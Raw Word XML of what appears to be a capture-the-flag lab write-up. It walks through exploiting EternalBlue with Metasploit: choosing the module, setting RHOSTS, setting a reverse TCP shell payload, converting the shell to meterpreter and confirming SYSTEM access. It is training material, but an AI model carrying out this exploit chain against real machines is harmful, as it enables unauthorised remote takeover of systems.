          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3271838" cy="380471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271838" cy="38047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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)</w:t>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exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the Metasploit Framework search command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search ms17_010</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the module exploit/windows/smb/ms17_010_eternalblue was identified in the results as the exploitation code for this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1117600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Rule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Show options and set the one required value. What is the name of this value? (All caps for submission)</w:t>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RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> command revealed that </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was marked as required but had no value set. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="13208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Rule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="457200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="381000"/>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Rule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pP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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set payload windows/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With that done, run the exploit!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="342900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2667000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="28"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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1257300"/>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spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1qpfregvb6h5" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kov20ut7bl7k" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1a79g9fz9xn0" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 3: Escalate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q1:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected) </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post/multi/manage/shell_to_meterpreter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1168400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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Rule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q2:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Select this (use MODULE_PATH). Show options, what option are we required to change?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ans: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SESSION</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output indicated that the SESSION parameter was required but had no value configured. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1346200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="31"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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set the required option, you may need to list all of the sessions to find your target here. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1231900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Run! If this doesn't work, try completing the exploit from the previous task once more.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006A">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1384300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Once the meterpreter shell conversion completes, select that session for use.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006C">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="700329"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image30.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image30.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:srcRect b="36616" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="70032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Rule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006E">
      <w:pPr>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">PoC:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006F">
